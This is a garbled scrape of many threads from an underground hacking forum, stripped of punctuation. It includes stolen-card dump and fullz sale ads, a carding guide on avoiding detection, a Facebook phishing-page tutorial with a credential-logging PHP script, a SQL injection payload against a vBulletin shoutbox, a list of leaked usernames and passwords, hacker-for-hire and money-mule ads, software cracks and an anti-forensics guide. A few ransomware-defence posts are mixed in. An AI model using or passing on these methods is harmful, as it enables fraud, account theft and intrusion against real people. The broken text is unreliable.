track mamiko kobayashi track atm pin state tokyo country japan track fatih gucer track atm pin state capa fatih country turkey track laleh babanazari track atm pin state guilan country india track bibliotheque track atm pin state quebec country canada track shue chen huang track atm pin state. 
counrty taiwan and more orther countries guarantee dumps pin for sale dumps valid rate refund hours dumps dead invalid you want buy dumps bulk please contact support for get the discount credit card usa asian inter. 
and many countries other type visa master amex discover cvv random format card number exp. 
date cvv cvv first name last name street city state zip code country phone type card bank name fullz info format card number exp. 
date cvv first name last name address city zipcode state country phone number ssn dob mother maiden name social security number transfer transfer transfer transfer transfer transfer icq support gmail martin. 
remy dumps shop new update all dumps have been checked befor added any expired can't added store and would our regular updates new hold all dumps expired this month page. 
and price this type cheaper tobe safe hold all dumps ccs the text. 
then buying pls dowload for got payment method bitcoin can't know who are you and contra automatic much address payment. 
store save yours and added balance hope cooperate with you soon sell track china dumps pin sell track and sell dumps track sell dumps pins atm dumps for sale atm dumps shop dumps shop dumps shop china dumps shop online shop cvv dumps buy dumps online shop dumps sell dumps good dumps cashout service cashout dumps cash out dumps pin cashout dumps sell dumps sell dumps dumps dumps shop dumps online sell dumps with pin duwith pin sell dumps sell dumps track shop dumps sell dumps cvv fullz infos sell sell all country amp dumps track dumps hight sell cvv fullz dumps track valid seller dumps shop dumps. 
doe wrote burp suite professional. 
fully cracked newest burp suite burp suite integrated platform for performing security testing web applications. 
its various tools work seamlessly together support the entire testing process from initial mapping and analysis application's attack surface through finding and exploiting security. 
burp gives you full control letting you combine advanced manual techniques with state the art automation make your work faster more effective and more fun. 
burp suite contains the following key components intercepting proxy which lets you inspect and modify traffic between your browser and the target application. 
application aware spider for crawling content and functionality. 
advanced web application scanner for automating the detection numerous types vulnerability. 
intruder tool for performing powerful customized attacks find and exploit unusual. 
repeater tool for manipulating and resending individual requests. 
sequencer tool for testing the randomness session tokens. 
the ability save your work and resume working later. 
extensibility allowing you easily write your own plugins perform complex and highly customized tasks within burp. 
burp easy use and intuitive allowing new users begin working right away. 
burp also highly configurable and contains numerous powerful features assist the most experienced testers with their work. 
here the newest cracked burp suite the only one that actually works because all other licenses are expired. 
seriously hit that button that's motivating factor password leakforums. 
use your own risk although its clean and use too. 
virus scan ejlidibi xepnt hodbfygjeqaqmg. 
links not working file missing. 
andrew alan hacker who has built very good reputation and undeniably one the best hackers you can come across. 
have got access hack into any account and also get generate passwords for accounts like facebook instagram twitter gmail yahoo mail whats app chat etc. 
also have logins for bank like boa welsfargo chase credit union capital one and many other different banks for transfers and credit card top ups retrieving hacked social media accounts clearing criminal records increase credit scores hack hacking computer systems website hack catch hacker scammers phishing emails that's mention few. 
somewhat similar but another incredibly easy way make money. 
bond benz wrote download. 
wrote below the download link hide reply evubcayb hcmbwr pfzuszkbj hboust slpthvrzjl hide reply thank you very much. 
blazelord wrote hey guys today would sharing this email spoofer font color all credits crypt. 
very good visit blog. 
thanks for the share keep the good work. 
let's try jakarta kebanjiran. 
hidemyass premium proxy list dec hidden content you must reply see linkshidemyass premium proxies really proxies support that can help individuals conceal from system agents and hackers. 
really excellent program make use simply because ultimately many people don comprehend completely what proxy servers. 
hidemyass premium proxies usually excellent plan test simply because ultimately most people don comprehend certainly what proxy servers. 
birmingham dependent organization that began its procedures. 
hidemyass definitely year old organization started the internet privateness plus they certainly know their things. 
hidemyass made solve the turmoil which issues the safety from the internet users privateness. 
will give you options for months which depends upon stipulations. 
among the also known virtual private network providers the web. 
hidemyass high quality proxy servers among the top virtual private network companies with greater than servers places globally. 
hidemyass has lot machines although not sufficient away shoreline machines. 
hidemyass has more than insolvency practitioners that customers can decide permitting elevated privacy and adaptability. 
other functions which are created and suitable enhance the web experience with somebody. 
hidemyass high quality proxy servers other qualities that are created and appropriate enhance the web experience with somebody. 
may the largest virtual private network providers available. 
hidemyass can provide you with numerous unfamiliar internet protocol handles which you can use. 
hidemyass includes system machines nations with openvpn. 
hidemyass has machines america north america united kingdom eire holland indonesia norway estonia italy euro and ukraine. 
two machines have been non cooperative away shoreline areas from the protection perspective this virtual private network does offer you accurate privacy you are using the away shoreline machines for delicate actions. 
hidemyass can fantastic program make use simply because ultimately many people don comprehend completely what proxy servers. 
comes down like simple. 
exe that you simply set your area and into the consumer particulars which are supplied whenever you purchase. 
how efficient will certainly get. 
before very long you searching anonymously online. 
for what ever factors you need hide your hidemyass high quality proxy servers without doubt practical answer. 
hidemyass offers the openvpn regular with user friendly software program the center the marketplace budget range. 
hidemyass lot machines although not sufficient away shoreline machines. 
the applying has numerous functions and easy setup and employ hidemyass high quality proxy servers the online privacy policy under perfect particular private data and insolvency practitioners are recorded and saved. 
this evaluation only addresses hidemyass open virtual private network support. 
another process they offer pptp going examined later around. 
hidden content you must reply see links. 
before logging delete cookies cache hidden content you must reply see links hidden content you must reply see links milicdimic milic randy passwort nikolasjb thebear johnnyele darkstar darmanthe festayre blkyn bojac kato goblue smokey faddeeff hazk vatfulbd scudogf oranges peachtree minskz rangers dustyta pistols traikieu thecuong cryo tjking tbrays swovy soheil ksseattle seattle briguy brighton dangarion qpalzm hgaudet randomword tblair zina shinji krani lill wrasser zdenny bagrbagr scttdvsn park trawetser alyssa dayreel djrules stewartk nicetits intencio keypeele lollipop lollipop sucka love pepe bunts gambit mattgio fuckyeah kato goblue hazk amw smack watchwatch useyourass alesbino maggio jonny. 
roth emims dcustriker yard hager tami llmilk sarah jireed track ikkybod ijjybod jfpersans jcooksey jbc tbjbb packers smokey bub hotmail. 
com cuntfucker adamnunn gmail. 
com lsutigers phorlando defense jolousax jlw lexluthor lexcorp minskz rangers mblaketws avon kai option dude maggie pfunky pfunked missingsangus yahoo. 
com marathon rasconza phoenix raulnet maria pbrhayes ahn alecffs allen jeuvg fuekj nativo nativo sanity hasso. 
think this will help hacking some stuff from android phone. 
nice but its bad hide content just ask for like least share free and will get opinion sorry for bad english cause its not main language. 
want learn about crlf injection using this app. 
someone with knowlegde can share. 
just reply php code. 
thanx too share bro. 
hey looking for someone hacka wordpress membership site and download all the training out and put inside mega. 
this the internet marketing niche. 
the membership site this. 
php dont think would too hard for any experienced hackers and think could one day job. 
please let know your price please. 
earn month lifetime forever guys don't often write guides but this time found new website that extremely promising let present you img publiboom website that guarantees fixed income every month once you hit certain goals. 
you will need lets see how register here. 
com abhishekk you can easily translate this website using chrome translation feature. 
important note your referrer will try give you much help possible. 
ask any question the thread mentioning quoting. 
can traduce you any part the site you wouldn't understand. 
you can also and will answer asap. 
register here this ref link here the non ref one register click registro how does this work you will publish ads their website and receive credits for. 
credits per published you have the basic membership but you can upgrade much better plans. 
more that later you publish ads and receive your credits just clicks then just fill the captcha and click publicar anuncio then just wait for the required seconds and validate receive your credits. 
you don't need watch the page for seconds you can switch another window and your usual stuff waiting for the sec timer expire sum all you need filling the captcha waiting for seconds then repeat money time when you reach. 
credits you will earn bono. 
that means that you can stop doing anything this site and you will still receive every month course reaching. 
credits can seem quite difficult first. 
but actually you work around day you can reach this goal month and then get your lifetime earnings. 
but fact you don't really work hours whenever you are waiting for the seconds you can other stuff usual watch videos your homework. 
payment publiboom pays via paypal the moment but extremely recent and they plan adding bank wirepayments well other platforms. 
for more info see the faq. 
com faq upgrading acount tired earning. 
credits per you can upgrade your account for fee and get many advantages everything explained here. 
com compensaciones while basic accounts earn. 
credits bronce bronze account will receive. 
credits per which more than times faster additionally you can earn bonos with basic account month lifetime this great but you want scale you will need upgrade bronze account will allow month lifetime they pay monthly basis the site actually ran professionals and there doubt they are paying. 
that's real business and not some hyip happy earnings and again i'm here help you through your journey towards lifetime residual income feel free ask any questions you will need dedication achieve the lifetime income but worth the effort register here. 
pratham wrote please check virus scan every software that you download from this forum and dont post harmful applications and softwares with keyloggers trogens and etc. 
check virus scan here great things. 
thanks for share good. 
thank you will try this. 
thanks alot bro the tut very usueful. 
uniscan internet server vulnerability scanner tool for unix operating system that was developed with the perl language and employed scan and realize all the subsequent forum webiste mentioned below remote file include local file include lfi php. 
info disclosure remote command execution rce cross site scripting xss blind sql injections source code disclosure sql injections mentioned above that uniscan tool written perl will have download the following modules perl first before installing the uniscan tool code root ubersec sudo perl mcpan 'install moose' root ubersec sudo perl mcpan 'install threads' root ubersec sudo perl mcpan 'install threads shared' root ubersec sudo perl mcpan 'install thread queue' root ubersec sudo perl mcpan 'install root ubersec sudo perl mcpan 'install root ubersec sudo perl mcpan 'install lwp useragent' root ubersec sudo perl mcpan 'install net ssleay' root ubersec sudo perl mcpan 'install getopt std' root ubersec sudo perl mcpan 'install yaml' install the above perl modules one one opening the terminal linux unix after finishing with the aboce modules download the latest version uniscan tool from the below mentioned link code. 
net projects uniscan files. 
download you can download directly with wget command the terminal below code root ubersec sudo wget. 
com downloads uniscan code. 
now extract the downloaded uniscan zipped tar file and then change the directory the folder using command and now you can scan any forum site for terminal with the following command code. 
com now the vulnerability scan will start and will look for sql rfi lfi backdoors emails webshells php info disclosure and lots more. 
happy once when the are scanned and got known with uniscan you can easily crack methods crack and explore the vulnerability using many tools available around the internet. 
note kali linux and backtrack has this pre installed them and hence can used directly without the burden such long installation process. 
will give feed back. 
its impossible hack this free sites. 
hmm the time running. 
maybe you know somebody this you also find way find somebody who able hack this test site and send the passwords. 
will raise may offer. 
thought india the coming technology with specialist programming and computers. 
hello everyone would like indroduce service drunkr which well known many russian and chineese hack forums. 
what drunkr constant buying service for your hacked. 
paying higher price than any competitor may offer you. 
highly depends the daily traffic volume and country. 
payments are done with btc ltc webmoney moneypack paypal ukash psc bank wire for big suppliers from. 
root requirements not too many linux ngnix debian centos freebsd apache installed preferred country germany usa canada japan europe latin america asia africa. 
price individual and discussed icq jabber. 
traffic stats checked constant suppliers check themselves. 
min traffic uvs day escrow you first. 
the price high paying weekly bonuses for constant suppliers. 
payment for constant well known suppliers. 
payment after check only not paying upfront. 
contact icq jabber exploit. 
supported languages are russian english will understand each other start selling your roots now and get your today tomorrow and everyday becoming constant supplier. 
german usa and roots are high demand now feb. 
codefire wrote update the user has coded automated script for the majority this guide. 
see here additional irongeek's hour anti forensics course video youtube. 
com watch video thank you. 
let try thanks anyway. 
interesting sent from using tapatalk. 
thanks man for this share. 
lets see this work. 
thanks bro you must thanks verry again. 
hey man lets see how works. 
tnx for sharing but these files are longer available their owner was violating our terms service. 
thanks for thanks for sharing this. 
thanks again awesome content. 
would like test this method. 
need sites access the dark net. 
buddy awesome thank you come again. 
sounds good where you type that sorry new some this. 
its drug based dictionary very concise. 
ever got your hands some fraud ccs never know how use them safetly get your clothes online without getting caught here are some basic tips prevent yourself from getting caught and getting packages note have put some resources the end this guide. 
feel free straight them you wish. 
you never ever use card more then. 
mainly because most cards assuming mastercard visa don't have more then. 
them even they credit card companies are usually called before the transaction goes through and the result your finished. 
the second rules carding the make sure you hide yourself well enough make sure one ever can find you. 
personal recommendation that you use proxy socks ideal never use transparent. 
vpn not really recommended read below for more info. 
strongly advised that you read the law your country regarding cyber crimes you know what happens you incase you get caught how deal with the situation. 
use your brain when you card. 
its simple when you card buy small items don't buy big. 
think about which nutcracker would hire lawyer run all over the world chasing you just for usd package the cost hiring lawyer for trial already much more then his law. 
lesson here buy small sell big your country. 
convert virtual cash real cash. 
which period the month best card for its the middle every month. 
simple most owners get their financial papers the every month. 
not buy anything that has delivered your house. 
you and the card gets reported you will get major trouble. 
you decide order something send neighbor someone who out town. 
suggest purchasing overnight you are not waiting and there's chance someone comes home whatever else. 
the best items buy online with any stuff that does not have delivered such vip site access other similar material. 
this works well because you cannot traced address. 
however you continue use the site make sure you use cgi php proxy which most sites and forums will allow just not make the purchase. 
not use your isps mail for any orders. 
the key using fraud ccs don't get caught. 
don't open your big mouth about carding you good luck. 
not create any payment gateway accounts with fraud ccs will alert the owner due many security processes and verification the card you will most likely fail complete and the card owner will notified. 
you intend money laundering get yourself some buyers first buy the items they want with your fraud ask them pay you via egold. 
why egold cuz there's charge back this guide not foolproof its just here guide you along the way not get caught. 
stated earlier not use vpns the main reason for this being vpn companies such veralinx will cooperate with the law and probably hand over your address and info them. 
advice stays use socks proxy some recommended procedures you could make purchase with fraud ccs smooth get proxy near the country the owner itself offer verify yourself getting phone spoofing account visit resources below some resources for addresses check your address make sure its not yours proxys recommended you use the first few normally pretty fast. 
phone spoofing verify yourself. 
that works friends are gonna get surprise. 
hope currently still works the moment. 
peiter zatko senior member icefog the founder metasploit. 
get questions before the exam hacking university portal background checks employee competitor monitoring bank legal hack discover hidden assets etc monitor your employees access your client competitor rival information and all related services also perform other services like hack into any government agency website hack into any data base system and grant you admin priviledge hack wordpress blogs server crashed hack untraceable and much more. 
believe mutual growing with client and hence work technology partner and consultant for our clients note all jobs range from hrs hrs max client satisfaction moore's priority you get your money's worth you refer client result the previous job done for you you will stand chance getting any job your choice hacked for you free charge. 
can also teach you how the following with our ebook and online tutorials hack and use credit card shop online monitor any phone and email address hack android iphones tap into anybody call and monitor their conversation email and text message interception for more information contact peiter zatko mudge. 
wrote hello friends this trick still working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort cheers mike lets see. 
this simple guide read somebody else facebook messages without any effort cheers mike thanks much pro. 
thanks for the showing bro. 
this simple guide read somebody else facebook messages without any effort cheers mike lets check this out. 
thankss bro let's see. 
lets check this out. 
cheers mike cant wait that thanks. 
systemx wrote admin please change the title facebook phishing hack your enemy's account facebook phishing tutorial hack your enemy's account. 
the facebook page and then right click the page will see the option view source page click that. 
now new tab will open which contain source code select all the stuff and paste notepad. 
now open the notepad and press ctrl and type action. 
you will have find text which looks like. 
delete all the text written red colour and instead write post. 
then will look like. 
now save your desktop with the name index. 
open new notepad and save the given data with the name post. 
txt foreach post variable value fwrite handle variable fwrite handle fwrite handle value fwrite handle fwrite handle fclose handle exit. 
you have two files now one index. 
htm and another post. 
php remember file extension important. 
now have upload web hosting site prefer use url. 
prefer use url because will easy use. 
now create account after that control pannel then file manager. 
after that new window will pop. 
delete the file named default. 
php after that upload two files index. 
now the last step click view index. 
htm will look same facebook page. 
copy the url that page and send this link your victim when your victim try login with the username and password. 
the page redirectly connect facebook. 
and you will now able see his password. 
open your webhost account and file manager then public html here you find new file named username. 
click view now will have your friend's password and email. 
this simple trick hack any facebook password account phishing page working. 
let see this work. 
thanks for posting looking forward work. 
onion tor almost undetectable all the anti viruses. 
white wrote hidden content you must reply see linkspaypal scam with this scam you can get victim logins victim personal information victim credit card victim bank details screentshot change your email this files login. 
php location secure home update and here some paypal letters you may need. 
greed wrote how crack steam accounts. 
get nice and good email combo list. 
load the combo list. 
load proxy list and select the specific type proxies you are using. 
set the desired threads and timeout. 
how works the program checks for working emails and tries logging into them. 
after succesfull login checks for all steam related emails like logs containing usersnames and passwords etc. 
luckmangamer wrote hidden content you must reply see links hello hackers and newbies don't forget hide your before doing anything. 
hope can run linux with win luckmangamer wrote hidden content you must reply see links hello hackers and newbies don't forget hide your before doing anything. 
verified account for sale new accounts never used and already verified ready. 
stop the annoying verification process. 
google outlook facebook twitter ecc. 
just ask and you'll get your verified account. 
pricing per account check this site for btc conversion accepted payment bitcoin escrow escrowmybits with fee coinb fee every account created ondemand and will delivered once the payment done. 
refunds because every account tested and sent the buyer. 
interested reply the thread. 
cant wait see that action thanks. 
com created tool just compromise hack forum account's. 
it's proxy supported and multi threaded. 
the program can scan hack forums web pages and find usernames emails. 
however manually have check them make sure they are authenticated first that it's not just some username email from thread. 
most the time accurate for usernames. 
anyway the tool can brute force the mybb login and offers certain proxies that will bypass hack forums. 
has captcha auto plugin for too types. 
just leave the tool running all day and based the password type you should have successful login manages crack few emails and managed crack some usernames. 
figured hey let's release the tool our forums and give the non users account sign underground exploits. 
com and message taz. 
will help you and show you how use the tool give you reputation start and award's just for signing get your career hacking start also keep mind that you must private message him for account. 
are not taking private messages here team underground exploits. 
com are looking for dedicated members share their ideas thoughts and computing skills. 
are not hack forums and never will. 
pride ourself knowing that can deliver better content. 
our staff members not troll you make fun you. 
are reasonable and laid back hacking forum. 
also have chat system and encryption system. 
encryption system what that hack forums white hat forum. 
why not create encryption system that allows you the user encrypt and encode your messages and only you know how encrypt and decrypt tis means our forum black hat forum where you can post 'illegal information'. 
will the feds have information they login see whats there hell underground exploits. 
com make sure all information encrypted before set out for public use. 
now look this way. 
fed were jack our forum they would have first decrypt all passwords and even the files lol. 
our secret black hat category also hidden where you cannot see. 
php the forum google cache. 
you will not find. 
register today underground exploits. 
com before you rant make any unwanted remarks about the website about how this breaks rules hack forums and how this illegal and how you want report the post for advertising. 
actually don't care some you already know been here before. 
obviously banning ain't doing damn thing. 
register our forums will teach you how unban yourself well have some really cool usergroups join sign underground exploits. 
will help you give you reputation start and award's just for signing get your career hacking start also keep mind that you must private message him for account. 
are not taking private messages here. 
have done something really silly. 
found out mates husband was cheating her and got into his facebook account which had left open android phone only uses when america send friend message from his account with all the details. 
used iphone's personal hotspot connect and sent the message through that rather then just use wifi. 
possible that someone else that's experienced hacker could find out address location details tracing back i'm really ashamed should have just told her. 
any help from you clever computer geniuses would appreciated. 
going test this out. 
hours ago bsalka wrote php skrip bekerja gratis untuk memeriksa email valid dan registred dengan paypal. 
jpg download hidden content anda harus membalas untuk melihat konten ini. 
thank you for this great sharing. 
how safe this website maybe there someone hack this site and send the passwords. 
will pay the first person who can this. 
best regards gloria thnx. 
facebook still the most difficult. 
blazelord wrote hey guys today would sharing this email spoofer font color all credits crypt great. 
wow thanks this will really helpful. 
parse error syntax error unexpected sym. 
thanks much for this share. 
hope the link isnt broken lel this site pisses off this forum shit every link click either only ads only ads thats all non skippabble just broken links never got anything this site please upload trusty site and listen comments and check damn links. 
yes will try best. 
pretty nice tutorial for more reference can visit owasp guide. 
codefire wrote hackers have great start new year giving public threat apple online icloud service. 
hacker using the handle has released password hacking tool github website that assures attackers break into any icloud account potentially giving them free access victims ios devices. 
the tool dubbed actually makes use exploit apple's icloud security infrastructure bypass restrictions and two factor authentication security that prevents brute force attacks and keeps most hackers away from gaining access users icloud accounts. 
readme disclaimer whatever you want with this code long you give credit check and make sure its legal your country use this tool before doing. 
i'm not responsible for any damage done whatsoever anyones icloud account idevice. 
didn't exploit any accounts while writing this well didn't even test out hope works lol. 
merely observed and reported. 
install put htdocs folder your xampp installation. 
install curl for your navigate url your web browser preferably firefox chrome safari. 
txt from ibrute and satisfies icloud password requirements it's been reported icloud server responds with error restart xampp your computer reports coming that server now patched with rate limiter server fully patched discontinue use you don't want lock your account what this working icloud apple dictionary attack that bypasses account lockout restrictions and secondary authentication any account. 
what this isn't bypass fully automated removal why this bug painfully obvious and was only matter time before was privately used for malicious nefarious activities publicly disclosed apple will patch. 
admin wrote color cpanel nightmare priv times faster from puplic version its shows becoz its code. 
hacking this tool was easy thank you bruh. 
add icq yahoo peter. 
thanks the best forever. 
thank you let's see. 
joomla security scanner url. 
gfzlg download here url swapnil haxor. 
first thanx for share. 
but dont think this method will help make server fully fud. 
the fact just bypass the check the scan tme. 
but not the runtime. 
must detected the antivirus the finally. 
hello can this tool help decrypt popcorn ransomware. 
com popcorn time because i've already tried almost everything but nothing helps. 
thanks man will give this try. 
example the control panel cryptolocker. 
hamza allou wrote audiada wrote pratham wrote happy new year. 
nice man and good share. 
color rip clone any website using httrack httrack free gpl libre free software and easy use offline browser utility. 
allows you download world wide web site from the internet local directory building recursively all directories getting html images and other files from the server your computer. 
httrack arranges the original site's relative link structure. 
simply open page the mirrored website your browser and you can browse the site from link link you were viewing online. 
httrack can also update existing mirrored site and resume interrupted downloads. 
httrack fully configurable and has integrated help system. 
read more download color. 
man will try nice. 
thanks bro will use ofc. 
cpanel nightmare priv times faster from puplic version its shows becoz its code. 
get here hide reply hidden content you must reply see links hide reply password hide reply hide reply. 
sounds like easy enough. 
hope this will work perfect. 
how working can one tell. 
silentsoul wrote wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort cheers mike show. 
this simple guide read somebody else facebook messages without any effort content hidden content you must reply see links table cheers mike briphil offline junior member posts threads joined mar reputation money donate let's see how works out joyjeus offline junior member posts threads joined mar reputation money donate let try. 
thread author replies views last post hack almost everyone. 
every facebook and email via facebook hack sruthy yesterday last post pootr hacking any ebay account just minute codefire last post xvyctim wireless hacking cracking wep wpa key via wifite tutorial neo jaguar codefire last post xvyctim must have hacking tut. 
hacker last post medlife how ethical password hacking and protecting ihatehissite last post ihatehissite hacking facebook pages codefire last post freddie hacking into computer with pictures codefire last post prasan collection hacking penetration testing and security cheatsheets codefire last post massesse hot tutorial hacking lol chat hack virg last post bladster wireless hacking cracking wep key codefire last post anana view printable version send this thread friend unsubscribe from this thread forum jump users browsing this thread xvyctim about offensive community offensive community world best underground hacking forum that provides tutorials latest hacking techniques free tools and great online teaching our members. 
color before proceed dns poisoning lets have some look basics. 
lets take look what dns first. 
you already know internet runs tcp model you can say internet protocol stack. 
tcp stack specifies and uses addresses example. 
route data between source and destination computer. 
every computer the world that connected network have address. 
since remembering addresses are difficult each address associated with name like. 
com which also known domain name. 
domain names are easy remember but original tcp stack needs address for communication not the domain name. 
service has been created convert these domain names into their respective addresses this service known domain name service dns computer system which provides this service known domain name system. 
now you can call coincidence that domain name service and domain name system both end having same abbreviation dns and the best part they don't even conflict with each other while using. 
dns runs dns protocol that translates web address into its respective address. 
now dns poisoning dns spoofing technique which attacker provides wrong address dns server for misdirecting users fake websites. 
following are types dns poisoning the next posts will cover them detailed. 
color intranet dns spoofing poisoning internet dns spoofing poisoning proxy server dns spoofing poisoning dns cache spoofing poisoning color intranet dns poisoning done over lan. 
usually performed over switched network with help arp poisoning. 
you can use cain and abel perform this kinda attack. 
internet dns poisoning can done over any system across world changing dns entries victim's computer. 
proxy server dns poisoning change proxy settings victim our address then redirect victim fake website. 
dns cache poisoning attacker changes address entries target website some specific dns server then any person asks that dns for information it'll provide fake information. 
does work onn wwindows passwords minute considered good speed. 
thank you i'm gonna give try. 
thanks bro wil try this tool. 
how send email inbox what the subject letter inbox. 
wtf leak let see wrote yea you heard correct its leaked not believe take look the link enjoy mike. 
curious see this thanks. 
it's recuva free software that use for files need recover. 
you can also select which files you want photos videos documents. 
inferno vbshout sqli day. 
found luit site hidden content you must reply see links mail luit usa. 
com date vulnerable code infernoshout. 
php commands unserialize this settings commands' this vbulletin affected rows this vbulletin query first select from. 
where user this vbulletin userinfo 'userid' this vbulletin query insert into. 
user commands values this vbulletin userinfo 'userid'. 
exploit location location hidden content you must reply see links sql injection and select from select count concat select select concat cast concat username password sal char from user where userid limit floor rand from information schema. 
tables group and how use insert sql injection into the first command input box and enter anything into the first command output box hit save settings you will treated with database error view the page source and scroll the bottom the page you will see some quoted text containing the data you want. 
peace out nigga found luit site hidden content you must reply see links mail luit usa. 
com peace out nigga. 
cool stuff over here its very awesome. 
thank you will try. 
very usefull very very very much. 
screenshoot download thanks broo thanks. 
thanks for the share sent from using tapatalk. 
can anybody tell how sniff facebook password with wireshark sslstrip kali linux. 
accept western union money transfers and moneygram drops. 
the number drops not limited. 
any interested person should ready start soon possible. 
she must know how accept payment via credit card and hack card make westernunion moneygram pickup. 
she will have any successful transaction. 
your will send you wish prefer bitcoins write email interested offer. 
yes first click download button and then freebit coin page will open now you have click don't have bitcoin address and then bitcoin wallet page will pop enter your valid email and choose your own password. 
then your mail that you have entered while registering bitcoin wallet then will mail your bitcoin address. 
just copy that and come back freebitcoin page enter your valid email again and choose your password and paste the bitcoin address that you copied from your email bitcoin address option click sign then click free btc top left hand side and click clam your freebit coin chose any type captca and then press roll. 
you will see the top right hand side that your bitcoins are increasing. 
continue this for every hour you can multiply. 
thats all enjoy note dont forget ref feral code. 
need cracker make the demo version vectorworks win full version. 
please send email claudia. 
cant wait see how this gose codefire wrote whmcs. 
sqli injection friends and enemies here the lastest vulnerability leaked black hackers market for whmcs vulnerability effects includes dbfunctions. 
substr value 'aes encrypt' query. 
result mysql query query whmcsmysql and download exploit from following link exploit python exploit php register new user target whmcs install register. 
php and edit the exploit with site name email and password. 
i've been trying get help get back for months now. 
tried password recovery they changed the email that didn't work. 
tried guessing the password didn't work either. 
can someone please help hack account i've been trying get back for majority. 
just warning can't pay i'm and don't have any money can someone please just help. 
web application vulnerability scanner webvulscan web application vulnerability scanner. 
web application itself written php and can used test remote local web applications for security. 
scan running details the scan are dynamically updated the user. 
these details include the status the scan the number urls found the web application the number found and details the found. 
after scan complete detailed pdf report emailed the user. 
the report includes descriptions the found and details where and how each vulnerability was exploited. 
features crawler crawls website identify and display all urls belonging the website. 
scanner crawls website and scans all urls found for. 
scan history allows user view download pdf reports previous scans that they performed. 
register allows user register with the web application. 
login allows user login the web application. 
options allows user select which they wish test for all are enabled default. 
pdf generation dynamically generates detailed pdf report. 
report delivery the pdf report emailed the user attachment. 
emailing pdf report now optional. 
therefore you can just view your scan history you wish instead having emailed you. 
crawling url the start the scan now optional. 
therefore you can now test single webpage for the various vulnerabilties instead scanning entire website. 
issues fixed that some users were having when running webvulscan linux static path references and case sensitivity. 
now tested windows xampp. 
running vista and linux xampp. 
added information about linux permissions instructions. 
txt format posted administrator. 
can't wait try this out. 
thanks bro god blessed you. 
there are certainly many ways make money online but takes time and hard work before things start running smoother. 
happyminer really amazing one such way make money online. 
recommend all and you should try this website. 
thnx for posting such informative tools. 
will check out thanks. 
thank you for posting. 
first download reshacker hidden content you must reply see links then open reshacker and select ''open'' hidden content you must reply see links now select winrar. 
exe now press ctrl and type please purchase without hidden content you must reply see links then click search and you will find some stuff. 
like here hidden content you must reply see links don't anything yet let explain how. 
right click the red squared text like this hidden content you must reply see links now click delete resource hidden content you must reply see links now save the file hidden content you must reply see links that doesn't work save the file elsewhere winrar. 
exe and then replace with the original file. 
poor protection download here hide reply attach attach hide reply dgg dgg gdg. 
thanks useful for the lazy guys like. 
thnkas much you are the boss. 
link expire dear bro. 
thank you very much for share this tool with. 
plz check the link. 
available english spanish and other languages. 
innoextractor useful application that helps you unpack inno setup installers using innounp technology and other own enhanced features. 
with innoextractor you can explore the internal structure and content the installer and you can extract them local folder portable devices without having run the setup. 
key features simple and friendly gui. 
open inno setup based installers into the application drag and drop executables from windows explorer. 
research scan all inno setup based installers available your hard drive. 
explore and inspect internal content files and more the installer. 
get the full script content installer. 
extract files local folder zip package self extracting module portable drag and drop feature. 
dump export code remobjects pascal assemply code registry and ini sections from the script readable file. 
extract the installer setup icon. 
run files the installer into the same application with double click. 
identify encrypted files the installer. 
perform file searches keyword. 
input panel that allows you enter valid password extract encrypted installers. 
properties panel see advanced information about the installer. 
history for recently opened installer. 
support older and latest versions inno setup. 
support older and latest versions innounp. 
application available multiple languages. 
designed for windows vista and. 
system requirements windows vista. 
inno setup based installers. 
thank you very much for share this tool thank you very much for share this tool. 
going try this out and see this still works. 
eset smart security keys enjoy urhn usa kbd pcb cmum sbv bnjn hpt amk xtx bbat bbps udrb agar jgpn gxfk bvkv ttu wtpf btsm uucf jjx rhx ajc ptt uecd download hidden content you must reply see links important choose the depending your system don't forget smack that. 
thank you very much for the share mate. 
guys founded csrf vulnerability file hosting site and informed site admin after the response i'll publish attack with details the site admin not responded not yet site name. 
sounds great will check out. 
hope the site works. 
security researcher has compiled ransomware removal and rescue kit help victims deal with ransomware threats and unlock encrypted files without paying off single penny the cyber crooks. 
ransomware growing threat the evolution cyber criminals techniques attempt part you from your money. 
typically the malicious software either lock victim computer system encrypt the documents and files some cases both extort money from victims. 
most often ransomware victims end paying off crooks either due the threat losing their important files panic the threat pretends from some government agency. 
though professionals and security companies have been dealing and fighting back with the ransomware threats security professional jada cyrus has compiled hidden content you must reply see links ransomware removal kit and made available for free online. 
ransomware removal kit download for free the ransomware malware removal kit supports hidden content you must reply see links variants along with instructions how perform the necessary tasks. 
you should never pay the ransom cyrus says. 
this will only reinforce this type attack. 
according most security intelligence reports criminal enterprises are already making large profits from ransomware. 
the ransomware response kit comes with the removal tools combat the following variants malware strains cryptolocker cryptolocker removal tools and threat mitigation fireeye tool decrypt files encrypted the cryptolocker ransomware trendmicro ransomware removaltool general ransomware removal tool from trendmicro fbiransomware fbiransomware removal tools coinvault coinvault ransomware removal tools teslacrypt tool for removing this variant cryptolocker ransomware cyrus encourages system administrators and professionals not pay the ransom the cyber criminals. 
instead they should first remove the infected machine from the corporate network prevent the spreading malware. 
once this done the users should then attempt identify the type ransomware their machine infected with. 
they should take images the encrypted box before removal for later analysis. 
once the type ransomware identifiable you have the above option try and decrypt files and remove the ransomware threat from the infected system with the help the kit's removal tools. 
ransomware threat has emerged past few years and many victims including local police departments pay ransom the crooks get their important and personal files back. 
keep yourself safe from this emerging threat. 
thanx bro really super man. 
can please try this software. 
lol thanks for this was just looking for program like that. 
hey everyone this first tutorial here take easy right first all all know how much windows logs and keeps information really shouldn't information that you would rather just doesn't have. 
you are using windows the very first thing you want full disk encryption must and can really hinder forensics investigations especially countries where forced password disclosure illegal and for countries where legal you can just use keyfiles also shred and burn the recovery disk would massive failure you did all this work and then get raided and they just use the recovery disk decrypt the drive. 
windows event view aka log everything the user does need disable this into msconfig and disable the windows service for event reporting then you want right click computer from the start menu and click manage into services and applications services and find the event report service stop right click and properties and select the startup type disabled. 
follow the same procedure above for the following services code windows event collector spp notification service system event notification service performance logs and alerts now need some software just for general security and anti forensics code url. 
com ccleaner url open ccleaner and enable all the options the cleaner window then options settings enable secure file deletion and wipe tips and cluster use pass also enable wipe drive free space and mtf space. 
run the cleaner and wipe everything then clean your registry don't back and then tools drive wiper and wipe the clean space your drives this big step because there lot info kept the mft. 
privazer similar ccleaner but what you should when you are finished with your computer and you are going asleep start privazer and enable start cleaning automatically and shutdown when finished you can start the cleaning process and sleep. 
does pass data default. 
install eraser delete things normally but then use eraser the recycle bin and will over write everything with pass and obfuscate the names they are not giving away anything. 
